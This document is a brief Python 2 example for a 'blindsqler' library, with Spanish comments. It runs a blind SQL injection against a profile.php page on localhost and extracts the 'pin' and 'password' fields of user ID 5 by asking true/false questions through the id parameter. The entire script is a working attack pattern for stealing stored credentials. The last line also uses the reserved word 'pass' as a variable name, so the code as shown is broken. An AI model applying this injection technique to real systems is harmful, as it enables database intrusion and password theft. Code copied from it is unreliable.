BlindSQLer example

1. #!/usr/bin/env python
2. #-*- coding: utf-8 -*-
3.  
4. import blindsqler
5. from urllib import urlopen, urlencode
6.  
7. class Localhost(blindsqler.QueryHandler):
8.         """ El manejador de querys de un server de prueba """
9.         def __init__(self, uid, field):
10.                 self.uid = uid # El ID del usuario
11.                 self.field = field # El campo cuyo valor se quiere adivinar
12.         def query(self, data):
13.                 url = "http://localhost/profile.php"
14.                 q = "%s AND %s %s" % (self.uid, self.field, data)
15.                 url = url + '?' + urlencode(dict(id=q))
16.                 pag = urlopen(url).read()
17.                 if "No hay resultados" in pag:
18.                         return False
19.                 else:
20.                         return True
21.  
22. localhost_pin = Localhost(5,'pin') # El campo pin del usuario con UID 5
23. pin = blindsqler.adivinaint(localhost_pin, [0,65535]) # Suponiendo que el valor máximo del pin sea 65535
24.  
25. localhost_pass = Localhost(5,'password') # El campo password del usuario con UID 5
26. pass = blindsqler.adivinastr(localhost_pass, length=30, mssql=False) # La máxima longitud sería 30, y le decimos que no usamos Microft SQL Server. Estos argumentos son opcionales